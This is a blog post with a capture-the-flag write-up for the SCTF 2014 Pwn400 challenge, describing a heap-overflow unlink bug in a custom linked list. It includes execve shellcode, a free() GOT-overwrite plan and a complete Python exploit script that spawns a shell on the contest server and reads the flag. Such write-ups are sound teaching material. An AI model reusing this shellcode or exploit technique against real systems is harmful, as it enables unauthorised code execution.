<!doctype html>



  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="CTF,Pwnable,Python,XCTF,SCTF,heap,shellcode," />





  <link rel="alternate" href="/atom.xml" title="Hacking Tube 2.0" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="Similar with Pwn200, Pwn400 gave us a binary file, but no libc.so. Open it with IDA Pro and analyze it, we found some information:">
<meta name="keywords" content="CTF,Pwnable,Python,XCTF,SCTF,heap,shellcode">
<meta property="og:type" content="article">
<meta property="og:title" content="SCTF 2014 -- Pwn400">
<meta property="og:url" content="https://bruce30262.github.io/2014/12/08/2014-12-08-sctf-2014-pwn400/index.html">
<meta property="og:site_name" content="Hacking Tube 2.0">
<meta property="og:description" content="Similar with Pwn200, Pwn400 gave us a binary file, but no libc.so. Open it with IDA Pro and analyze it, we found some information:">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2018-01-03T15:08:05.591Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SCTF 2014 -- Pwn400">
<meta name="twitter:description" content="Similar with Pwn200, Pwn400 gave us a binary file, but no libc.so. Open it with IDA Pro and analyze it, we found some information:">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://bruce30262.github.io/2014/12/08/2014-12-08-sctf-2014-pwn400/"/>





  <title>SCTF 2014 -- Pwn400 | Hacking Tube 2.0</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-100090256-1', 'auto');
  ga('send', 'pageview');
</script>












  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hacking Tube 2.0</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Security and stuff.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://bruce30262.github.io/2014/12/08/2014-12-08-sctf-2014-pwn400/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Bruce Chen">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://s.gravatar.com/avatar/ff4140457527a5c7d307793a9ec905e0?s=80">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hacking Tube 2.0">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SCTF 2014 -- Pwn400</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2014-12-08T14:54:00+08:00">
                2014-12-08
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/write-ups/" itemprop="url" rel="index">
                    <span itemprop="name">write-ups</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2014/12/08/2014-12-08-sctf-2014-pwn400/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2014/12/08/2014-12-08-sctf-2014-pwn400/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-eye"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>views
            </span>
          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Similar with Pwn200, Pwn400 gave us a binary file, but no libc.so. Open it with IDA Pro and analyze it, we found some information:<br><a id="more"></a></p>
<p>First, there’s a data structure ( let’s call it <strong>node</strong> ) which look like this:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">node</span>&#123;</span></span><br><span class="line">  node *<span class="keyword">this</span>; <span class="comment">// the address of this node</span></span><br><span class="line">  node *prev; <span class="comment">// the address of the previous node</span></span><br><span class="line">  node *next; <span class="comment">// the address of the next node</span></span><br><span class="line">  <span class="keyword">char</span> title[<span class="number">64</span>];</span><br><span class="line">  <span class="keyword">char</span> type[<span class="number">32</span>];</span><br><span class="line">  <span class="keyword">char</span> content[<span class="number">256</span>];</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>In this program, we’re allow to:</p>
<ol>
<li>New a node</li>
<li>Show a node’s address ( yep, no need to leak it! )</li>
<li>Edit a node’s content</li>
<li>Delete a node (by giving its address)</li>
</ol>
<p>Notice that <strong>we can ovewrite a node’s data by overflowing its previous node’s content</strong>. Moreover, after checking the function of deleting a node, we found the following code:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( *(_DWORD *)ptr == ptr )</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> ( *(_DWORD *)a1 == ptr )</span><br><span class="line">    &#123;</span><br><span class="line">        *(_DWORD *)a1 = *(_DWORD *)(*(_DWORD *)a1 + <span class="number">8</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ( *(_DWORD *)(ptr + <span class="number">8</span>) )</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">/* the unlink vulnerability */</span></span><br><span class="line">            v1 = *(_DWORD *)(ptr + <span class="number">8</span>);</span><br><span class="line">            v2 = *(_DWORD *)(ptr + <span class="number">4</span>);</span><br><span class="line">            *(_DWORD *)(v2 + <span class="number">8</span>) = v1;</span><br><span class="line">            *(_DWORD *)(v1 + <span class="number">4</span>) = v2;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            *(_DWORD *)(*(_DWORD *)(ptr + <span class="number">4</span>) + <span class="number">8</span>) = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    write(<span class="number">1</span>, <span class="string">"succeed!\n\n"</span>, <span class="number">0xA</span>u);</span><br><span class="line">    <span class="built_in">free</span>((<span class="keyword">void</span> *)ptr);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>The vulnerability’s obvious: <strong>Heap overflow</strong>, except it use its own data structure.</p>
<p>Since it doesn’t enable the DEP protection, we can store our shellcode in a known memory address (<strong>which is, in this case, a node’s content</strong>), then exploit the heap overflow vulnerability, by overwriting <code>free()</code>‘s GOT, let the function pointer point to our shellcode. </p>
<p>For instance:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//free's GOT entry: 0x0804a450</span></span><br><span class="line">v1 = node-&gt;next <span class="comment">// 0x0804a44c, because 0x0804a44c+4 = 0x0804a450  </span></span><br><span class="line">v2 = node-&gt;prev <span class="comment">// shellcode's address</span></span><br><span class="line">*(_DWORD *)(shellcode's address + <span class="number">8</span>) = <span class="number">0x0804a44c</span> ; <span class="comment">//4 bytes of shellcode will be overwritten</span></span><br><span class="line">*(_DWORD *)(<span class="number">0x0804a450</span>) = shellcode's address; <span class="comment">// overwrite free()'s GOT</span></span><br></pre></td></tr></table></figure></p>
<p>Note that 4 bytes in shellcode will be overwritten, so we’ll have to use <code>jmp relative</code> to skip those 4 bytes machine code. Here’s my shellcode:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"\x90\x90\x90\x90\x90\x90"</span>+ <span class="comment"># NOP</span></span><br><span class="line"><span class="string">"\xeb\x08"</span>+ <span class="comment"># skip 8 bytes</span></span><br><span class="line"><span class="string">"AAAA"</span>+ <span class="comment"># overwritten part</span></span><br><span class="line"><span class="string">"\x90"</span>*<span class="number">10</span>+ <span class="comment"># NOP</span></span><br><span class="line"><span class="string">"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x59\x50\x5a\xb0\x0b\xcd\x80"</span> <span class="comment"># shell</span></span><br></pre></td></tr></table></figure>
<p>So here’s the exploitation:</p>
<ol>
<li>New 3 nodes: node1, node2 &amp; node3</li>
<li>Store the shellcode in node3’s content</li>
<li>Get the address of node3 &amp; node2, calculate the shellcode’s address</li>
<li>Edit node1, overwrite node2’s prev &amp; next by overflowing node1’s content</li>
<li>Delete node2, overwrite <code>free()</code>‘s GOT,  execute the shellcode &amp; capture the flag</li>
</ol>
<p>Here’s the python script. Due to the connection problem, it has to wait 1 second before it recieve server’s response.</p>
<figure class="highlight python"><figcaption><span>pwn400.py</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"></span><br><span class="line">sock = socket(AF_INET, SOCK_STREAM)</span><br><span class="line">sock.connect((<span class="string">"218.2.197.248"</span>, <span class="number">10003</span>))</span><br><span class="line"></span><br><span class="line">shell = <span class="string">"\x90\x90\x90\x90\x90\x90"</span>+<span class="string">"\xeb\x08"</span>+<span class="string">"AAAA"</span>+<span class="string">"\x90"</span>*<span class="number">10</span>+<span class="string">"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x59\x50\x5a\xb0\x0b\xcd\x80"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#insert node1</span></span><br><span class="line">sock.send(<span class="string">"1\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"1\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"1\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"1\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#insert node2</span></span><br><span class="line">sock.send(<span class="string">"1\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"2\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"2\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"2\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#insert node3</span></span><br><span class="line">sock.send(<span class="string">"1\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"3\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"3\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(shell+<span class="string">"\n"</span>) <span class="comment">#write shellcode to node3's content</span></span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#show node 3 address</span></span><br><span class="line">sock.send(<span class="string">"3\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"3\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line">res = sock.recv(<span class="number">1024</span>)</span><br><span class="line"><span class="keyword">print</span> res</span><br><span class="line"></span><br><span class="line"><span class="comment">#calculate shellcode's address</span></span><br><span class="line">index = res.index(<span class="string">"0x"</span>)</span><br><span class="line">temp = res[index:index+<span class="number">10</span>:]</span><br><span class="line">shellcode_addr = int(temp, <span class="number">16</span>)+<span class="number">108</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"shellcode address: "</span>, hex(shellcode_addr)</span><br><span class="line">shellcode_addr_str = binascii.a2b_hex(hex(shellcode_addr)[<span class="number">2</span>:<span class="number">10</span>:].zfill(<span class="number">8</span>))</span><br><span class="line"><span class="keyword">print</span> shellcode_addr_str</span><br><span class="line"></span><br><span class="line"><span class="comment">#show node 2 address</span></span><br><span class="line">sock.send(<span class="string">"3\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"2\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line">res = sock.recv(<span class="number">1024</span>)</span><br><span class="line"><span class="keyword">print</span> res</span><br><span class="line"></span><br><span class="line">index = res.index(<span class="string">"0x"</span>)</span><br><span class="line">temp = res[index:index+<span class="number">10</span>:]</span><br><span class="line">address = int(temp, <span class="number">16</span>)</span><br><span class="line">del_addr = hex(address)[<span class="number">2</span>::]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"node2 address:"</span>, del_addr</span><br><span class="line">node2_addr_str = binascii.a2b_hex(hex(address)[<span class="number">2</span>:<span class="number">10</span>:].zfill(<span class="number">8</span>))</span><br><span class="line"><span class="keyword">print</span> node2_addr_str </span><br><span class="line"></span><br><span class="line"><span class="comment">#BBBB: offset</span></span><br><span class="line"><span class="comment">#free()'s GOT: 0x0804a450, we send 0x0804a44c</span></span><br><span class="line">exploit = <span class="string">"A"</span>*<span class="number">256</span>+<span class="string">"BBBB"</span>+node2_addr_str[::<span class="number">-1</span>]+shellcode_addr_str[::<span class="number">-1</span>]+<span class="string">"\x4c\xa4\x04\x08"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#edit node 1</span></span><br><span class="line">sock.send(<span class="string">"4\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(<span class="string">"1\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(exploit+<span class="string">"\n"</span>) <span class="comment">#overflow node1's content</span></span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#delete node 2</span></span><br><span class="line">sock.send(<span class="string">"5\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line">sock.send(del_addr+<span class="string">"\n"</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line">sock.send(<span class="string">'cat /home/pwn3/flag/flag\n'</span>) <span class="comment">#capture the flag</span></span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">print</span> sock.recv(<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line">sock.close()</span><br></pre></td></tr></table></figure>
<p>The “BBBB” in the exploit is a 4 bytes data between each node. It actually is the meta data of a chunk. The <code>free()</code> function will check the meta data before it free the memory of a node. If the meta data isn’t correct, the program will crash. But since we overwrite <code>free()</code>‘s GOT, that meta data’s no longer a problem.</p>
<p>flag: <code>SCTF{2318540E78446A0E84EF69685092F0C3}</code></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/Pwnable/" rel="tag"># Pwnable</a>
          
            <a href="/tags/Python/" rel="tag"># Python</a>
          
            <a href="/tags/XCTF/" rel="tag"># XCTF</a>
          
            <a href="/tags/SCTF/" rel="tag"># SCTF</a>
          
            <a href="/tags/heap/" rel="tag"># heap</a>
          
            <a href="/tags/shellcode/" rel="tag"># shellcode</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2014/12/08/2014-12-08-sctf-2014-pwn200/" rel="next" title="SCTF 2014 -- Pwn200">
                <i class="fa fa-chevron-left"></i> SCTF 2014 -- Pwn200
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2014/12/08/2014-12-08-sctf-2014-code400/" rel="prev" title="SCTF 2014 -- Code400">
                SCTF 2014 -- Code400 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- Go to www.addthis.com/dashboard to customize your tools -->
<div class="addthis_inline_share_toolbox">
  <script type = "text/javascript" src = "//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-592d8051fa91b8b6" async = "async" ></script>
</div>

      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      

      <section class="site-overview sidebar-panel sidebar-panel-active">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="https://s.gravatar.com/avatar/ff4140457527a5c7d307793a9ec905e0?s=80"
               alt="Bruce Chen" />
          <p class="site-author-name" itemprop="name">Bruce Chen</p>
           
              <p class="site-description motion-element" itemprop="description">Security researcher / CTFer / Pwner</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">50</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">61</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/bruce30262" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  Github
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/bruce30262" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://www.facebook.com/bruce.chen.102" target="_blank" title="Facebook">
                  
                    <i class="fa fa-fw fa-facebook"></i>
                  
                  Facebook
                </a>
              </span>
            
          
        </div>

        
        
          <div class="cc-license motion-element" itemprop="license">
            <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" target="_blank">
              <img src="/images/cc-by-nc-sa.svg" alt="Creative Commons" />
            </a>
          </div>
        

        
        

        


      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2017 - 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Bruce Chen</span>
</div>


<div class="powered-by">
  Powered by <a class="theme-link" href="https://hexo.io">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      Total visitors
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      Total views
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.1"></script>



  
